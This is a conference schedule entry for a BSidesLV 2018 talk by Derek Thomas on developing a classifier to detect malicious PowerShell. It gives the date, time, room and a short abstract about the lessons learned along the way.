PowerShell Classification: Life, Learning, and Self-Discovery

BSidesLV 2018

Presented by: Derek Thomas
Date: Wednesday August 08, 2018
Time: 11:00 - 11:55
Location: Ground Truth

By now, many security practitioners know that PowerShell is a powerful scripting language used by administrators and adversaries alike. Many blue team professionals may also know that effective detective controls are very difficult to develop due to the flexibility of PowerShell. This presentation covers the journey where I try to develop effective detective mechanisms for malicious PowerShell, shortcomings of this attempt, my first attempt at developing a classifier, the problems I encountered, the lessons I learned, and the success in the end. I will cover the development of the initial prototype from start to finish but the greatest value is in the lessons that were learned during the journey.

Derek Thomas


KhanFu - Mobile schedules for INFOSEC conferences.
Mobile interface | Alternate Formats